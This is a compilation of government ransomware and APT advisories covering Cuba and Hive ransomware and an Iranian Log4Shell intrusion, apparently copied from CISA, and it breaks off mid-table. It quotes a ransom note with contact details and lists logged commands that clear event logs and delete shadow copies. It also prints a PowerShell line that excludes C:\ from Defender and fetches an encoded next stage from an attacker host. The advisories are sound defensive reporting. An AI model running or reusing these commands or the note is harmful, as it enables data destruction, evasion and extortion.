Greetings! Unfortunately we have to report that your company were compromised. All your files were encrypted and you can’t restore them without our private key. Trying to restore it without our help may cause complete loss of your data. Also we researched whole your corporate network and downloaded all your sensitive data to our servers. If we will not get any contact from you in the next 3 days we will public it in our news site. You can find it there ( https[:]// cuba4ikm4jakjgmkeztyawtdgr2xymvy6nvgw5cglswg3si76icnqd.onion/ ) Tor Browser is needed ( https[:]//www.torproject.org/download/ ) Also we respect your work and time and we are open for communication. In that case we are ready to discuss recovering your files and work. We can grant absolute privacy and compliance with agreements by our side. Also we can provide all necessary evidence to confirm performance of our products and statements. Feel free to contact us with quTox ( https[:]//tox.chat/download.html ) Our ToxID: 37790E2D198DFD20C9D2887D4EF7C3E295188842480192689864DCCA3C8BD808A18956768271 Alternative method is email: inbox@mail.supports24[.]net Mark your messages with your personal ID:

Additional resources to detect possible exploitation or compromise:

Palo Alto Networks Novel News on Cuba Ransomware: Greetings From Tropical Scorpius
BlackBerry blog RomCom Threat Actor Abuses KeePass and SolarWinds to Target Ukraine and Potentially the United Kingdom
BlackBerry blog Unattributed RomCom Threat Actor Spoofing Popular Apps Now Hits Ukrainian Militaries

MITRE ATT&CK TECHNIQUES

Cuba ransomware actors use the ATT&CK techniques listed in Table 6. Note: For details on TTPs listed in the table, see FBI Flash Indicators of Compromise Associated with Cuba Ransomware.

Resource Development
Technique Title	ID	Use
Compromise Infrastructure: Domains	T1584.001	Cuba ransomware actors use compromised networks to conduct their operations.
Initial Access
Technique Title	ID	Use
Valid Accounts	T1078	Cuba ransomware actors have been known to use compromised credentials to get into a victim’s network.
External Remote Services	T1133	Cuba ransomware actors may leverage external-facing remote services to gain initial access to a victim’s network.
Exploit Public-Facing Application	T1190	Cuba ransomware actors are known to exploit vulnerabilities in public-facing systems.
Phishing	T1566	Cuba ransomware actors have sent phishing emails to obtain initial access to systems.
Execution
Technique Title	ID	Use
Command and Scripting Interpreter: PowerShell	T1059.001	Cuba ransomware actors have used PowerShell to escalate privileges.
Software Deployment Tools	T1072	Cuba ransomware actors use Hancitor as a tool to spread malicious files throughout a victim’s network.
Privilege Escalation
Technique Title	ID	Use
Exploitation for Privilege Escalation	T1068	Cuba ransomware actors have exploited ZeroLogon to gain administrator privileges.[2]
Defense Evasion
Technique Title	ID	Use
Impair Defenses: Disable or Modify Tools	T1562.001	Cuba ransomware actors leveraged a loader that disables security tools within the victim network.
Lateral Movement
Technique Title	ID	Use
Remote Services Session: RDP Hijacking	T1563.002	Cuba ransomware actors used RDP sessions to move laterally.
Credential Access
Technique Title	ID	Use
Credential Dumping: LSASS Memory	T1003.001	Cuba ransomware actors use LSASS memory to retrieve stored compromised credentials.
Steal or Forge Kerberos Tickets: Kerberoasting	T1558.003	Cuba ransomware actors used the Kerberoasting technique to identify service accounts linked to active directory.[2]
Command and Control
Technique Title	ID	Use
Proxy: Manipulate Command and Control Communications	T1090	Industrial Spy ransomware actors use HTTP/HTTPS proxy via a C2 server to direct traffic to avoid direct connection. [2]

Mitigations

Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies.
- Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.
- Store passwords in hashed format using industry-recognized password managers.
- Add password user “salts” to shared login credentials.
- Avoid reusing passwords.
- Implement multiple failed login attempt account lockouts.
- Disable password “hints.”
- Refrain from requiring password changes more frequently than once per year.
- Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
- Require administrator credentials to install software.
Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching SonicWall firewall vulnerabilities and known exploited vulnerabilities in internet-facing systems. Note: SonicWall maintains a vulnerability list that includes Advisory ID, CVE, and mitigation. Their list can be found at psirt.global.sonicwall.com/vuln-list.
Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege.
Disable unused ports.
Consider adding an email banner to emails received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). JIT sets a network-wide policy in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly maintain backup and restoration. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.

RESOURCES

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents immediately. Report to a local FBI Field Office, or CISA at us-cert.cisa.gov/report.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.

ACKNOWLEDGEMENTS

FBI and CISA would like to thank BlackBerry, ESET, The National Cyber-Forensics and Training Alliance (NCFTA), Palo Alto Networks, and PRODAFT for their contributions to this CSA.

References

[1] Palo Alto Networks: Tropical Scorpius

[2] Palo Alto Networks: Novel News on Cuba Ransomware - Greetings From Tropical Scorpius

[3] BlackBerry: Unattributed RomCom Threat Actor Spoofing Popular Apps Now Hits Ukrainian Militaries

[4] BlackBerry: RomCom Threat Actor Abuses KeePass and SolarWinds to Target Ukraine and Potentially the United Kingdom

Revisions

December 1, 2022: Initial Version|December 12, 2022: Added new IP addresses and IOCs

#StopRansomware: Hive Ransomware

CISA — Tue, 31 Jan 2023 16:32:46 EST

Summary

Actions to Take Today to Mitigate Cyber Threats from Ransomware:

• Prioritize remediating known exploited vulnerabilities.
• Enable and enforce multifactor authentication with strong passwords
• Close unused ports and remove any application not deemed necessary for day-to-day operations.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.

FBI, CISA, and HHS encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Victims of ransomware operations should report the incident to their local FBI field office or CISA.

Download the PDF version of this report: pdf, 852.9 kb.

For a downloadable copy of IOCs, see AA22-321A.stix (STIX, 43.6 kb).

Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

As of November 2022, Hive ransomware actors have victimized over 1,300 companies worldwide, receiving approximately US$100 million in ransom payments, according to FBI information. Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks. From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).

The method of initial intrusion will depend on which affiliate targets the network. Hive actors have gained initial access to victim networks by using single factor logins via Remote Desktop Protocol (RDP), virtual private networks (VPNs), and other remote network connection protocols [T1133]. In some cases, Hive actors have bypassed multifactor authentication (MFA) and gained access to FortiOS servers by exploiting Common Vulnerabilities and Exposures (CVE) CVE-2020-12812. This vulnerability enables a malicious cyber actor to log in without a prompt for the user’s second authentication factor (FortiToken) when the actor changes the case of the username.

Hive actors have also gained initial access to victim networks by distributing phishing emails with malicious attachments [T1566.001] and by exploiting the following vulnerabilities against Microsoft Exchange servers [T1190]:

CVE-2021-31207 - Microsoft Exchange Server Security Feature Bypass Vulnerability
CVE-2021-34473 - Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2021-34523 - Microsoft Exchange Server Privilege Escalation Vulnerability

After gaining access, Hive ransomware attempts to evade detention by executing processes to:

Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption [T1562].
Stop the volume shadow copy services and remove all existing shadow copies via vssadmin on command line or via PowerShell [T1059] [T1490].
Delete Windows event logs, specifically the System, Security and Application logs [T1070].

Prior to encryption, Hive ransomware removes virus definitions and disables all portions of Windows Defender and other common antivirus programs in the system registry [T1112].

Hive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz [T1537]. In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.

During the encryption process, a file named *.key (previously *.key.*) is created in the root directory (C:\ or /root/). Required for decryption, this key file only exists on the machine where it was created and cannot be reproduced. The ransom note, HOW_TO_DECRYPT.txt is dropped into each affected directory and states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered [T1486]. The ransom note contains a “sales department” .onion link accessible through a TOR browser, enabling victim organizations to contact the actors through a live chat panel to discuss payment for their files. However, some victims reported receiving phone calls or emails from Hive actors directly to discuss payment.

The ransom note also threatens victims that a public disclosure or leak site accessible on the TOR site, “HiveLeaks”, contains data exfiltrated from victim organizations who do not pay the ransom demand (see figure 1 below). Additionally, Hive actors have used anonymous file sharing sites to disclose exfiltrated data (see table 1 below).

Figure 1: Sample Hive Ransom Note

*Table 1: Anonymous File Sharing Sites Used to Disclose Data*
https://anonfiles[.]com
https://mega[.]nz
https://send.exploit[.]in
https://ufile[.]io
https://www.sendspace[.]com
https://privatlab[.]net
https://privatlab[.]com

Once the victim organization contacts Hive actors on the live chat panel, Hive actors communicate the ransom amount and the payment deadline. Hive actors negotiate ransom demands in U.S. dollars, with initial amounts ranging from several thousand to millions of dollars. Hive actors demand payment in Bitcoin.

Hive actors have been known to reinfect—with either Hive ransomware or another ransomware variant—the networks of victim organizations who have restored their network without making a ransom payment.

Indicators of Compromise

Threat actors have leveraged the following IOCs during Hive ransomware compromises. Note: Some of these indicators are legitimate applications that Hive threat actors used to aid in further malicious exploitation. FBI, CISA, and HHS recommend removing any application not deemed necessary for day-to-day operations. See tables 2–3 below for IOCs obtained from FBI threat response investigations as recently as November 2022.

*Table 2: Known IOCs as of November 2022*
Known IOCs - Files
HOW_TO_DECRYPT.txt typically in directories with encrypted files
*.key typically in the root directory, i.e., C:\ or /root
hive.bat
shadow.bat
asq.r77vh0[.]pw - Server hosted malicious HTA file
asq.d6shiiwz[.]pw - Server referenced in malicious regsvr32 execution
asq.swhw71un[.]pw - Server hosted malicious HTA file
asd.s7610rir[.]pw - Server hosted malicious HTA file
Windows_x64_encrypt.dll
Windows_x64_encrypt.exe
Windows_x32_encrypt.dll
Windows_x32_encrypt.exe
Linux_encrypt
Esxi_encrypt
Known IOCs – Events
System, Security and Application Windows event logs wiped
Microsoft Windows Defender AntiSpyware Protection disabled
Microsoft Windows Defender AntiVirus Protection disabled
Volume shadow copies deleted
Normal boot process prevented
Known IOCs – Logged Processes
wevtutil.exe cl system
wevtutil.exe cl security
wevtutil.exe cl application
vssadmin.exe delete shadows /all /quiet
wmic.exe SHADOWCOPY /nointeractive
wmic.exe shadowcopy delete
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no

*Table 3: Potential IOC IP Addresses as of November 2022*
Potential IOC IP Addresses for Compromise or Exfil:
84.32.188[.]57	84.32.188[.]238
93.115.26[.]251	185.8.105[.]67
181.231.81[.]239	185.8.105[.]112
186.111.136[.]37	192.53.123[.]202
158.69.36[.]149	46.166.161[.]123
108.62.118[.]190	46.166.161[.]93
185.247.71[.]106	46.166.162[.]125
5.61.37[.]207	46.166.162[.]96
185.8.105[.]103	46.166.169[.]34
5.199.162[.]220	93.115.25[.]139
5.199.162[.]229	93.115.27[.]148
89.147.109[.]208	83.97.20[.]81
5.61.37[.]207	5.199.162[.]220
5.199.162[.]229;	46.166.161[.]93
46.166.161[.]123;	46.166.162[.]96
46.166.162[.]125	46.166.169[.]34
83.97.20[.]81	84.32.188[.]238
84.32.188[.]57	89.147.109[.]208
93.115.25[.]139;	93.115.26[.]251
93.115.27[.]148	108.62.118[.]190
158.69.36[.]149/span>	181.231.81[.]239
185.8.105[.]67	185.8.105[.]103
185.8.105[.]112	185.247.71[.]106
186.111.136[.]37	192.53.123[.]202

MITRE ATT&CK TECHNIQUES

See table 4 for all referenced threat actor tactics and techniques listed in this advisory.

Table 4: Hive Actors ATT&CK Techniques for Enterprise
Initial Access
Technique Title	ID	Use
External Remote Services	T1133	Hive actors gain access to victim networks by using single factor logins via RDP, VPN, and other remote network connection protocols.
Exploit Public-Facing Application	T1190	Hive actors gain access to victim network by exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-42321.
Phishing	T1566.001	Hive actors gain access to victim networks by distributing phishing emails with malicious attachments.
Execution
Technique Title	ID	Use
Command and Scripting Interpreter	T1059	Hive actors looks to stop the volume shadow copy services and remove all existing shadow copies via vssadmin on command line or PowerShell.
Defense Evasion
Technique Title	ID	Use
Indicator Removal on Host	T1070	Hive actors delete Windows event logs, specifically, the System, Security and Application logs.
Modify Registry	T1112	Hive actors set registry values for DisableAntiSpyware and DisableAntiVirus to 1.
Impair Defenses	T1562	Hive actors seek processes related to backups, antivirus/anti-spyware, and file copying and terminates those processes to facilitate file encryption.
Exfiltration
Technique Title	ID	Use
Transfer Data to Cloud Account	T1537	Hive actors exfiltrate data from victims, using a possible combination of Rclone and the cloud storage service Mega.nz.
Impact
Technique Title		Use
Data Encrypted for Impact	T1486	Hive actors deploy a ransom note HOW_TO_DECRYPT.txt into each affected directory which states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered.
Inhibit System Recovery	T1490	Hive actors looks to stop the volume shadow copy services and remove all existing shadow copies via vssadmin via command line or PowerShell.

Mitigations

FBI, CISA, and HHS recommend organizations, particularly in the HPH sector, implement the following to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Hive ransomware:

Verify Hive actors no longer have access to the network.
Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
Require phishing-resistant MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
If used, secure and monitor RDP.
- Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure.
- After assessing risks, if you deem RDP operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse.
- If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.
- Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
- Be sure to properly configure devices and enable security features.
- Disable ports and protocols not used for business purposes, such as RDP Port 3389/TCP.
Maintain offline backups of data, and regularly maintain backup and restoration. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure. Ensure your backup data is not already infected.,
Monitor cyber threat reporting regarding the publication of compromised VPN login credentials and change passwords/settings if applicable.
Install and regularly update anti-virus or anti-malware software on all hosts.
Enable PowerShell Logging including module logging, script block logging and transcription.
Install an enhanced monitoring tool such as Sysmon from Microsoft for increased logging.
Review the following additional resources.
- The joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
- The Cybersecurity and Infrastructure Security Agency-Multi-State Information Sharing & Analysis Center Joint Ransomware Guide covers additional best practices and ways to prevent, protect, and respond to a ransomware attack.
- StopRansomware.gov is the U.S. Government’s official one-stop location for resources to tackle ransomware more effectively.

If your organization is impacted by a ransomware incident, FBI, CISA, and HHS recommend the following actions.

Isolate the infected system. Remove the infected system from all networks, and disable the computer’s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected.
Turn off other computers and devices. Power-off and segregate (i.e., remove from the network) the infected computer(s). Power-off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering-off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.
Secure your backups. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.

In addition, FBI, CISA, and HHS urge all organizations to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Preparing for Cyber Incidents

Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
Document and monitor external remote connections. Organizations should document approved solutions for remote management and maintenance, and immediately investigate if an unapproved solution is installed on a workstation.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).

Identity and Access Management

Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.
- Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.
- Store passwords in hashed format using industry-recognized password managers.
- Add password user “salts” to shared login credentials.
- Avoid reusing passwords.
- Implement multiple failed login attempt account lockouts.
- Disable password “hints.”
- Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.
  Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
- Require administrator credentials to install software.
Require phishing-resistant multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.

Protective Controls and Architecture

Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.

Vulnerability and Configuration Management

Consider adding an email banner to emails received from outside your organization.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Ensure devices are properly configured and that security features are enabled.
Restrict Server Message Block (SMB) Protocol within the network to only access necessary servers and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.

REFERENCES

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

INFORMATION REQUESTED

The FBI, CISA, and HHS do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered. However, the FBI, CISA, and HHS understand that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers. Regardless of whether you or your organization decide to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to your local FBI field office, or to CISA at report@cisa.gov or (888) 282-0870. Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under US law, and prevent future attacks.

The FBI may seek the following information that you determine you can legally share, including:

Recovered executable files
Live random access memory (RAM) capture
Images of infected systems
Malware samples
IP addresses identified as malicious or suspicious
Email addresses of the attackers
A copy of the ransom note
Ransom amount
Bitcoin wallets used by the attackers
Bitcoin wallets used to pay the ransom
Post-incident forensic reports

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.

Revisions

Initial Version: November 17, 2022

Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester

CISA — Tue, 31 Jan 2023 16:32:46 EST

Summary

From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch (FCEB) organization where CISA observed suspected advanced persistent threat (APT) activity. In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. CISA and the Federal Bureau of Investigation (FBI) assess that the FCEB network was compromised by Iranian government-sponsored APT actors.

CISA and FBI are releasing this Cybersecurity Advisory (CSA) providing the suspected Iranian government-sponsored actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.

CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities. If suspected initial access or compromise is detected based on IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems (including the DC), and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this CSA to protect against similar malicious cyber activity.

For more information on Iranian government-sponsored Iranian malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threats webpage.

Download the PDF version of this report: pdf, 528 kb.

For a downloadable copy of the Malware Analysis Report (MAR) accompanying this report, see: MAR 10387061-1.v1.

For a downloadable copy of IOCs, see: AA22-320A.stix, 1.55 mb.

Technical Details

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques with corresponding mitigation and/or detection recommendations.

Overview

In April 2022, CISA conducted retrospective analysis using EINSTEIN—an FCEB-wide intrusion detection system (IDS) operated and monitored by CISA—and identified suspected APT activity on an FCEB organization’s network. CISA observed bi-directional traffic between the network and a known malicious IP address associated with exploitation of the Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon servers. In coordination with the FCEB organization, CISA initiated threat hunting incident response activities; however, prior to deploying an incident response team, CISA observed additional suspected APT activity. Specifically, CISA observed HTTPS activity from IP address 51.89.181[.]64 to the organization’s VMware server. Based on trusted third-party reporting, 51.89.181[.]64 is a Lightweight Directory Access Protocol (LDAP) server associated with threat actors exploiting Log4Shell. Following HTTPS activity, CISA observed a suspected LDAP callback on port 443 to this IP address. CISA also observed a DNS query for us‐nation‐ny[.]cf that resolved back to 51.89.181[.]64 when the victim server was returning this Log4Shell LDAP callback to the actors’ server.

CISA assessed that this traffic indicated a confirmed compromise based on the successful callback to the indicator and informed the organization of these findings; the organization investigated the activity and found signs of compromise. As trusted-third party reporting associated Log4Shell activity from 51.89.181[.]64 with lateral movement and targeting of DCs, CISA suspected the threat actors had moved laterally and compromised the organization’s DC.

From mid-June through mid-July 2022, CISA conducted an onsite incident response engagement and determined that the organization was compromised as early as February 2022, by likely Iranian government-sponsored APT actors who installed XMRig crypto mining software. The threat actors also moved laterally to the domain controller, compromised credentials, and implanted Ngrok reverse proxies.

Threat Actor Activity

In February 2022, the threat actors exploited Log4Shell [T1190] for initial access [TA0001] to the organization’s unpatched VMware Horizon server. As part of their initial exploitation, CISA observed a connection to known malicious IP address 182.54.217[.]2 lasting 17.6 seconds.

The actors’ exploit payload ran the following PowerShell command [T1059.001] that added an exclusion rule to Windows Defender [T1562.001]:

powershell try{Add-MpPreference -ExclusionPath 'C:\'; Write-Host 'added-exclusion'} catch {Write-Host 'adding-exclusion-failed' }; powershell -enc "$BASE64 encoded payload to download next stage and execute it"

The exclusion rule allowlisted the entire c:\drive, enabling threat actors to download tools to the c:\drive without virus scans. The exploit payload then downloaded mdeploy.text from 182.54.217[.]2/mdepoy.txt to C:\users\public\mde.ps1 [T1105]. When executed, mde.ps1 downloaded file.zip from 182.54.217[.]2 and removed mde.ps1 from the disk [T1070.004].

file.zip contained XMRig cryptocurrency mining software and associated configuration files.

WinRing0x64.sys – XMRig Miner driver
wuacltservice.exe – XMRig Miner
config.json – XMRig miner configuration
RuntimeBroker.exe – Associated file. This file can create a local user account [T1136.001] and tests for internet connectivity by pinging 8.8.8.8 [T1016.001]. The exploit payload created a Scheduled Task [T1053.005] that executed RuntimeBroker.exe daily as SYSTEM. Note: By exploiting Log4Shell, the actors gained access to a VMware service account with administrator and system level access. The Scheduled Task was named RuntimeBrokerService.exe to masquerade as a legitimate Windows task.

See MAR 10387061-1.v1 for additional information, including IOCs, on these four files.

After obtaining initial access and installing XMRig on the VMWare Horizon server, the actors used RDP [T1021.001] and the built-in Windows user account DefaultAccount [T1078.001] to move laterally [TA0008] to a VMware VDI-KMS host. Once the threat actor established themselves on the VDI-KMS host, CISA observed the actors download around 30 megabytes of files from transfer[.]sh server associated with 144.76.136[.]153. The actors downloaded the following tools:

PsExec – a Microsoft signed tool for system administrators.
Mimikatz – a credential theft tool.
Ngrok – a reverse proxy tool for proxying an internal service out onto an Ngrok domain, which the user can then access at a randomly generated subdomain at *.ngrok[.]io. CISA has observed this tool in use by some commercial products for benign purposes; however, this process bypasses typical firewall controls and may be a potentially unwanted application in production environments. Ngrok is known to be used for malicious purposes.[1]

The threat actors then executed Mimikatz on VDI-KMS to harvest credentials and created a rogue domain administrator account [T1136.002]. Using the newly created account, the actors leveraged RDP to propagate to several hosts within the network. Upon logging into each host, the actors manually disabled Windows Defender via the Graphical User Interface (GUI) and implanted Ngrok executables and configuration files. The threat actors were able to implant Ngrok on multiple hosts to ensure Ngrok’s persistence should they lose access to a machine during a routine reboot. The actors were able to proxy [T1090] RDP sessions, which were only observable on the local network as outgoing HTTPS port 443 connections to tunnel.us.ngrok[.]com and korgn.su.lennut[.]com (the prior domain in reverse). It is possible, but was not observed, that the threat actors configured a custom domain, or used other Ngrok tunnel domains, wildcarded here as *.ngrok[.]com, *.ngrok[.]io, ngrok.*.tunnel[.]com, or korgn.*.lennut[.]com.

Once the threat actors established a deep foothold in the network and moved laterally to the domain controller, they executed the following PowerShell command on the Active Directory to obtain a list of all machines attached to the domain [T1018]:

Powershell.exe get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address >

The threat actors also changed the password for the local administrator account [T1098] on several hosts as a backup should the rogue domain administrator account get detected and terminated. Additionally, the threat actor was observed attempting to dump the Local Security Authority Subsystem Service (LSASS) process [T1003.001] with task manager but this was stopped by additional anti-virus the FCEB organization had installed.

MITRE ATT&CK TACTICS AND TECHNIQUES

See table 1 for all referenced threat actor tactics and techniques in this advisory, as well as corresponding detection and/or mitigation recommendations. For additional mitigations, see the Mitigations section.

*Table 1: Cyber Threat Actors ATT&CK Techniques for Enterprise*
Initial Access
Technique Title	ID	Use	Recommendations
Exploit Public-Facing Application	T1190	The actors exploited Log4Shell for initial access to the organization’s VMware Horizon server.	Mitigation/Detection: Use a firewall or web-application firewall and enable logging to prevent and detect potential Log4Shell exploitation attempts [M1050]. Mitigation: Perform regular vulnerability scanning to detect Log4J vulnerabilities and update Log4J software using vendor provided patches [M1016],[M1051].
Execution
Technique Title	ID	Use	Recommendation
